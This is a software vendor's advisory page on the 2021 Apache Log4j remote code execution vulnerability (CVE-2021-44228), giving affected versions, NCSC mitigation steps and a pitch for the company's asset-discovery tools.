Apache Log4j Vulnerability - What you need to know
On December 12th 2021 a vulnerability was identified in the Apache logging application – Log4j (v2.0 – 2.14). Please be aware that all Certero products whether provisioned on-premises or as SaaS, are not affected by this vulnerability. Certero can however, be used to rapidly identify systems that are.
What is the Apache Log4j Vulnerability?
Tracked as CVE-2021-44228 and classified as severe, this remote code execution (RCE) vulnerability allows an attacker to potentially gain access to systems via the Java logging library through the insertion of a malicious code string, which then allows them to do various malicious activities such as taking control, importing malware or harvesting data.
What is the Impact?
Log4j 2 is commonly used to log activity within applications and is included in Apache frameworks including:
- Apache Struts2
- Apache Solr
- Apache Druid
- Apache Flink
- Apache Swift
Due to its widespread use, a substantial amount of systems are affected. Systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java.
Microsoft has stated that the bulk of attacks they have observed at this time have been ‘related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers’.
Version 1 of the Log4j library is no longer supported and is affected by multiple security vulnerabilities. Developers should migrate to the latest version of Log4j 2.
What can I do to mitigate the risk?
The UK National Cyber Security Centre has advised the following steps to mitigate the risk:
- If you are using the Log4j 2 library as a dependency within an application you have developed, ensure you update to version 2.15.0 or later
- If you are using an affected third-party application, ensure you keep the product updated to the latest version
- The flaw can also be mitigated in previous releases (2.10 and later) by setting system property “log4j2.formatMsgNoLookups” to “true” or removing the JndiLookup class from the classpath
How Certero can help – Visibility
Application vendors are releasing patches or workarounds for their products so please ensure you follow individual manufacturer information to mitigate against the vulnerability.
Certero can be used to identify installations of Log4j on Linux devices by creating a dynamic group. Certero is able to identify systems where Apache is installed which can then be further interrogated for instances of vulnerable versions of Log4J. For assistance, please contact Certero through the Customer Center.
Certero’s Commitment to Security
Security remains of paramount importance to Certero, as demonstrated by maintaining both ISO 27001 and Cyber Essentials Plus Certification for all Certero products and services. Certero’s commitment to creating best-of-breed, secure solutions is baked-in to our development philosophy of keeping all solution development in-house within Certero and freeing customers from the burden and risks of legacy technology.
For more information contact Certero today and for regular updates, follow Certero on LinkedIn.
Want to discuss your challenges?
Certero’s [software-as-a-service] Solution
Certero help organizations transform their outdated operations and technologies in days and weeks not years. All of Certero’s solutions can be delivered as SaaS with no loss of functionality.
Certero Unified Platform
Learn more about Certero’s truly unique ‘unified’ platform.
Digital Transformation Edition
Transform in days and weeks, not months and years, start your journey now.
Verified Oracle LMS/GLAS Solution
Verified LMS (License Management Services), now GLAS (Global Licensing & Advisory Services) solution.
Cloud Management
Manage Visibility, Cost and Governance of your Cloud Resources
Enterprise Standard Edition – ITAM / SAM for Wintel
Default solution to manage ITAM/SAM for a Wintel environment.
Enterprise Premium Edition – ITAM / SAM for Wintel
All you need in one place to manage your ITAM/SAM for a Wintel & Citrix environment.
Datacenter
Stand-a-lone or holistic solutions for IBM, SAP and Oracle.
Software License Compliance
One Stop Shop, products and services for any solution – all in one
Business Intelligence Solution
See how to turn DATA into INFORMATION then transform into KNOWLEDGE, all in a few clicks.
IT Asset Visibility
Find out: What do I own? Where is it located? Who is using it?
ITSM & CMDB Integration
Populating the CMDB with ‘Quality’ asset information is more critical than ever
SaaS Subscription Management
Discover, manage and optimize your SaaS investments.
Everything in One place, True Unification
Certero for Enterprise ITAM
Networks, printers, routers, Wintel, Mac, Linux, zLinux, Unix, all virtualizations and much more….
Certero for Enterprise SAM
Focused on Wintel software vendors, including automated solutions for Microsoft, Adobe and much more…
Certero App Centre
Enterprise ‘Application Portal’ for Self-Service application provisioning.
Certero for Mobile
Go beyond standard MDM and deliver full management and security for your mobile workforce.
Certero SRDB (Software Recognition)
Transform raw software inventory data into actionable intelligence about application usage and licensing.
Certero for Oracle
Optimize your Oracle Database, Middleware and E-Business Suite applications.
Certero for IBM
Discover and manage all IBM software & entitlements across the network. Dual Inventory, ILMT and Certero.
Certero for SAP Applications
Managing and automating the analysis of complex SAP named user and engine licenses across your estate.
Passworks
An intuitive self-service password reset solution that can reduce service desk calls by 30%.
PowerStudio
PC Power Management solution. Save money and reduce your carbon footprint.
See, Manage and Eliminate Over-Spending with your SaaS Subscriptions.
Certero
Technology Led
Services
Strategic Services
Tactical Services
Certero Channel Partner Program
Our Partner Program opens up Certero solutions to a global network of partners – enabling customers to work with the trusted solution and service providers that know them best.
Join the Partner Program
Information on tiers and ease of doing business.
Deal Registrations
Submit your deal-registrations.
Launching the Program
Highest-rated major SAM vendor on Gartner Peer Insights, launch global Partner Program.
Gartner Peer Insights Customers’ Choice
Rated #1 for SAM Customer Satisfaction year after year, after year
Blog
For the latest in ITAM, SAM, Cloud and SaaS Asset Management
White Papers and eBooks
Download the latest white papers and eBooks for key insights and guides.
News
Read the latest news from Certero and the industry.
Events and Webinars
Keep up to date with Certero’s latest webinars and events.
Videos
View our range of product videos, webinars and customer case studies.
Data Sheets
Download our datasheets which highlight the key benefits and features of our world class products and services.
Case Studies
See how organization around the globe change they way they [Do IT].
We think [and do] IT Differently
About Us
Get to know us more
Our Story
See how our approach is different
Our Journey
A timeline of events
Our Vision, Mission and Purpose
Mission, Purpose and Values
Careers
Browse our current roles
Locations
Find our nearest location